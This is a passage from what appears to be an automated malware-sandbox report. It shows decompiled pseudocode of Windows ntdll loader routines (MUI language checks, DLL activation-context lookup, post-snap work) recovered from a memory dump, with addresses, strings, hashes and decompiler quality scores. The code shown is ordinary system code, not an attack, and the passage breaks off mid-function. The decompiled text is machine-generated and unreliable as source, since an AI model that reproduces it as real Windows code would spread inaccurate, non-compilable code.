				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01921B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L019377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01921B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L019377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01921B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01921B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01921B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L019377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L019377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01934620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0195F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01961370(_t276, 0x18f4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0195BB40(0,  &_v68, _t170);
									if(L019243C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L019377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L019377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0195BB40(_t257,  &_v68, _t243);
								if(L019243C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01961370(_t278, 0x18f4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01934620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0195F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01961370(_v16, 0x18f4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0195BB40(_t262,  &_v68, _t244);
								if(L019243C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01961370(_t282, 0x18f4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0195BB40(_t262,  &_v68, _t201);
							if(L019243C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L019377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L019377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01934620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0195F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01961370(_t280, 0x18f4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0195BB40(_t267,  &_v68, _t245);
							if(L019243C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01961370(_t284, 0x18f4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0195BB40(_t267,  &_v68, _t224);
						if(L019243C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L019377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L019377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x01923d3c
0x01923d42
0x01923d44
0x01923d46
0x01923d49
0x01923d4c
0x01923d4f
0x01923d52
0x01923d55
0x01923d58
0x01923d5b
0x01923d5f
0x01923d61
0x01923d66
0x01978213
0x01978218
0x01924085
0x01924088
0x0192408e
0x01924094
0x0192409a
0x019240a0
0x019240a6
0x019240a9
0x019240af
0x019240b6
0x019240bd
0x019240bd
0x01923d83
0x0197821f
0x01978229
0x01978238
0x01978238
0x0197823d
0x0197823d
0x01923da0
0x01923daf
0x01923db5
0x01923dba
0x01923dba
0x01923dd4
0x01923e94
0x01923eab
0x01923f6d
0x01923f84
0x0192406b
0x0192406b
0x0192406e
0x0192406e
0x01924070
0x01924074
0x01978351
0x01978351
0x0192407a
0x0192407f
0x0197835d
0x01978370
0x01978377
0x01978379
0x0197837c
0x0197837c
0x0197835d
0x00000000
0x0192407f
0x01923f8a
0x01923f8d
0x01923f90
0x01923f95
0x0197830d
0x0197830f
0x01923f9b
0x01923fac
0x01923fae
0x01923fb1
0x01923fb1
0x01923fb6
0x01978317
0x0197831a
0x00000000
0x01923fbc
0x01923fc1
0x01923fc9
0x01923fd7
0x01923fda
0x01923fdd
0x01924021
0x01924021
0x01924029
0x01924030
0x01924044
0x01924046
0x01924046
0x01924044
0x01924049
0x01978327
0x01978334
0x01978339
0x0197833c
0x0192404f
0x0192404f
0x0192404f
0x01924051
0x01924056
0x01924063
0x01924063
0x01924068
0x00000000
0x01924068
0x01923fdf
0x01923fe2
0x01923fe4
0x01923fe7
0x01923fef
0x01924003
0x01924005
0x01924005
0x0192400c
0x01924013
0x01924016
0x01924017
0x0192401b
0x0192401e
0x00000000
0x0192401e
0x01923fb6
0x01923eb1
0x01923eb4
0x01923eb7
0x01923ebc
0x019782a9
0x019782ab
0x01923ec2
0x01923ed3
0x01923ed5
0x01923ed8
0x01923ed8
0x01923edd
0x019782b3
0x019782b6
0x00000000
0x01923ee3
0x01923ee8
0x01923eed
0x01923ef0
0x01923ef3
0x01923f02
0x01923f05
0x01923f08
0x019782c0
0x019782c3
0x019782c5
0x019782c8
0x019782d0
0x019782e4
0x019782e6
0x019782e6
0x019782ed
0x019782f4
0x019782f7
0x019782f8
0x019782fc
0x019782ff
0x019782ff
0x01923f0e
0x01923f11
0x01923f16
0x01923f1d
0x01923f31
0x01978307
0x01978307
0x01923f31
0x01923f39
0x01923f48
0x01923f4d
0x01923f50
0x01923f50
0x01923f53
0x01923f58
0x01923f65
0x01923f65
0x01923f6a
0x00000000
0x01923f6a
0x01923edd
0x01923dda
0x01923ddd
0x01923de0
0x01923de5
0x01978245
0x01923deb
0x01923df7
0x01923dfc
0x01923dfe
0x01923e01
0x01923e01
0x01923e06
0x0197824d
0x0197824f
0x01978254
0x00000000
0x01923e0c
0x01923e11
0x01923e16
0x01923e19
0x01923e29
0x01923e2c
0x01923e2f
0x0197825c
0x0197825f
0x01978261
0x01978264
0x0197826c
0x01978280
0x01978282
0x01978282
0x01978289
0x01978290
0x01978293
0x01978294
0x01978298
0x0197829b
0x0197829b
0x01923e35
0x01923e38
0x01923e3d
0x01923e44
0x01923e58
0x019782a3
0x019782a3
0x01923e58
0x01923e60
0x01923e6f
0x01923e74
0x01923e77
0x01923e77
0x01923e7a
0x01923e7f
0x01923e8c
0x01923e8c
0x01923e91
0x00000000
0x01923e91

Strings

WindowsExcludedProcs, xrefs: 01923D6F
Kernel-MUI-Language-Disallowed, xrefs: 01923E97
Kernel-MUI-Language-SKU, xrefs: 01923F70
Kernel-MUI-Number-Allowed, xrefs: 01923D8C
Kernel-MUI-Language-Allowed, xrefs: 01923DC0

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 22b06acd0cbb9113f87a5c6e2f993ecbf6169aed89cba78dbce3eb5930f39963
Instruction ID: d0cb544545ced73721fcee06f62ec5e59e370d0ded2e4c8b24b6ad4cac63a59b
Opcode Fuzzy Hash: 22b06acd0cbb9113f87a5c6e2f993ecbf6169aed89cba78dbce3eb5930f39963
Instruction Fuzzy Hash: F4F13E72D40629EBDB11DF98C984DEEBBBDFF48650F15046AE909E7214E7349E01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01948E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01948E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x1a0d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1a08464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1a05780 & 0x00000003) != 0) {
							E01995510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1a05780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0195B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1a07984; // 0x14c2b70
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1a08464; // 0x74b10110
					 *0x1a0b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01949B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1a05780 & 0x00000005) != 0) {
						_push(_t49);
						E01995510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x01948e0f
0x01948e16
0x01948e19
0x01948e1b
0x01948e21
0x01948e7f
0x01948e85
0x01989354
0x0198936c
0x01989371
0x0198937b
0x01989381
0x01989381
0x0198937b
0x01948e9d
0x01948e9d
0x01948e29
0x01948e2c
0x01948e38
0x01948e3e
0x01948e43
0x01948eb5
0x01948eb9
0x019892aa
0x019892af
0x019892e8
0x019892e8
0x019892af
0x01948eb9
0x01948e45
0x01948e53
0x01948e5b
0x01948e5f
0x01948e78
0x01948e78
0x01948e7d
0x01948ec3
0x01948ecd
0x01948ed2
0x01948ed2
0x01948ec5
0x01948ec5
0x00000000
0x01948e7d
0x01948e67
0x01948ea4
0x0198931a
0x00000000
0x00000000
0x01989320
0x01948ea4
0x01948e70
0x01989325
0x01989340
0x01989345
0x01989345
0x01948e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0198932A
minkernel\ntdll\ldrsnap.c, xrefs: 0198933B, 01989367
LdrpFindDllActivationContext, xrefs: 01989331, 0198935D
Querying the active activation context failed with status 0x%08lx, xrefs: 01989357

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 61958fb0d846e7648b88fc9c233b80d2494cb283f4dc454d637881a5c4d74bba
Instruction ID: 553985c1225a9f919504d873c8ab17c665d103bae64a7a8fe79b318bc0ef94f2
Opcode Fuzzy Hash: 61958fb0d846e7648b88fc9c233b80d2494cb283f4dc454d637881a5c4d74bba
Instruction Fuzzy Hash: E5412A32A003159FEB37BADCC88CE3776A9AB44755F06456EEA0C97152E770BD818381

Uniqueness

Uniqueness Score: -1.00%

Function 01928794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E01928794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0192934A() != 0) {
								_t159 = E0199A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1a05780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01995510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1a05780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0192849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01928999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01928999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1a05c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1a05c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01932280(_t92, 0x1a086cc);
															_t94 = E019E9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E019461A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1a05c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01928A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1a05c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1a05c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0195F380(_t136, 0x18f1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01932280(_t108, 0x1a086cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E019461A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E019E9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0192FFB0(_t118, _t156, 0x1a086cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01959A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x01928799
0x0192879d
0x019287a1
0x019287a3
0x019287a8
0x019287c3
0x019287c3
0x019287c8
0x019287d1
0x019287d4
0x019287d8
0x019287e5
0x019287ec
0x01979bfe
0x01979c00
0x01979c02
0x01979c08
0x01979c0d
0x01979c0f
0x01979c14
0x01979c2d
0x01979c32
0x01979c37
0x01979c3a
0x01979c3c
0x01979c42
0x01979c42
0x01979c3c
0x01979c02
0x019287da
0x019287df
0x019287e3
0x00000000
0x00000000
0x019287e3
0x019287f2
0x00000000
0x019287fb
0x019287fd
0x019287fe
0x0192880e
0x0192880f
0x01928810
0x01928814
0x0192881a
0x0192881c
0x0192881f
0x01928821
0x01928822
0x01928824
0x01928826
0x0192882c
0x0192882e
0x01979c48
0x01979c48
0x01928834
0x01928834
0x01928837
0x00000000
0x00000000
0x01928837
0x0192882e
0x0192883d
0x01928840
0x01928843
0x01928846
0x01928849
0x0192884c
0x0192884e
0x01928850
0x01928852
0x01928854
0x01928857
0x019288b4
0x019288b6
0x019288b6
0x01928859
0x01928859
0x01928859
0x01928861
0x01928866
0x0192886a
0x0192893d
0x01928941
0x00000000
0x01928947
0x01928947
0x0192894a
0x0192894c
0x00000000
0x01928952
0x01928955
0x0192895a
0x0192895d
0x0192895d
0x0192895f
0x01928961
0x01928961
0x01928968
0x00000000
0x00000000
0x0192896a
0x0192896b
0x0192896e
0x00000000
0x01928970
0x01928970
0x01928970
0x01928970
0x01928972
0x01928972
0x01928974
0x00000000
0x0192897a
0x0192897a
0x0192897d
0x00000000
0x01928983
0x01979c65
0x01979c6d
0x01979c72
0x01979c75
0x01979c75
0x01979c82
0x01979c86
0x01979c87
0x01979c88
0x01979c89
0x01979c8c
0x01979c90
0x01979c95
0x01979c97
0x01979ca0
0x01979ca3
0x01979ca9
0x01979ca9
0x00000000
0x01979ca9
0x01979ca3
0x00000000
0x01979c97
0x0192897d
0x00000000
0x01928974
0x01928988
0x01928992
0x01928996
0x00000000
0x01928996
0x0192894c
0x00000000
0x01928870
0x0192887b
0x0192887d
0x0192887f
0x01928881
0x01928884
0x01928884
0x01928886
0x01928889
0x0192888c
0x0192888e
0x01928891
0x01928891
0x01928898
0x00000000
0x00000000
0x0192889a
0x0192889b
0x0192889e
0x00000000
0x00000000
0x019288a0
0x019288a8
0x019288b0
0x019288b2
0x019288d3
0x019288d5
0x00000000
0x019288d7
0x019288db
0x019288dc
0x019288e0
0x019288e8
0x019288ee
0x019288f0
0x019288f3
0x019288fc
0x01928901
0x01928906
0x0192890c
0x0192890c
0x0192890f
0x01928916
0x01928917
0x01928918
0x01928919
0x0192891a
0x0192891f
0x01928921
0x01979c52
0x01979c55
0x01979c5b
0x01979cac
0x01979cc0
0x01979cc0
0x01979c55
0x01928927
0x01928927
0x0192892f
0x01928933
0x00000000
0x019288f5
0x019288f5
0x00000000
0x019288f7
0x019288f7
0x019288fa
0x00000000
0x00000000
0x00000000
0x00000000
0x019288fa
0x019288f5
0x019288f3
0x00000000
0x019288d5
0x00000000
0x019288b2
0x019288c9
0x00000000
0x019288c9
0x0192887f
0x0192886a
0x01928857
0x01928852
0x019288bf
0x019288bf
0x019287aa
0x019287ad
0x019287ae
0x019287b4
0x019287b5
0x019287b6
0x019287b8
0x019287bd
0x019287c1
0x019287f4
0x019287fa
0x00000000
0x00000000
0x00000000
0x019287c1
0x00000000

Strings

LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01979C18
minkernel\ntdll\ldrsnap.c, xrefs: 01979C28
LdrpDoPostSnapWork, xrefs: 01979C1E

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 1555480b412aab956c98a4a1dbf026e383179e46c48a28662239996622afe754
Instruction ID: 8baf33fa0127d5abb8b9a69f7489f6ae95c394ac526e3fd7408549424e808dad
Opcode Fuzzy Hash: 1555480b412aab956c98a4a1dbf026e383179e46c48a28662239996622afe754
Instruction Fuzzy Hash: CC912331A00226DFEF19DF59D880ABA77F9FF94315B044169EA0DAB248E770ED01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01927E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E01927E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0192CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
